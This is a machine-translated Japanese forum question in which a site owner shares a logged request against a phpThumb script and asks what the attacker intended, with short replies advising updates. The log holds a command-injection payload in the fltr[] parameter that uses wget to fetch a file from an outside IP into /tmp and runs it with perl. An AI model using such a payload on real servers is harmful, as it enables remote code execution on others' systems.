私は攻撃者からエラーを受けています。彼らは何をしようとしているのですか?ここでは、ログです:すべての入力とその他のものをログに記録するエラーログスクリプトを書きました
Monday 26th of December 2011 12:10:18 PM
src=file.jpg&fltr[]=blur|
9%20-quality%20%2075%20interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
91.121.133.22
| 39757
| /var/www/class.php
| /class/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9
[SRC = file.jpg] - [FLTR =アレイ] - [phpThumbDebug = 9] -
私は新しい行に領域を分離しました。そのほとんどは入力であり、サーバーポート、IPアドレス、アクセスしたスクリプトがあります。彼らはコマンドラインにアクセスするために悪用しようとしていたようです。しかし、これは彼らが考えるスクリプトではありません。
1日3回起きている –
IPなどをブロックしてみることもできますが、最善の策はすべてを更新し、安全なソフトウェアを使用することです。 – Robus
stuが言ったように、あなたのアクセスログを開くと、攻撃の数万トン、奇妙なユーザーエージェント、悪用の人々が襲います – dm03514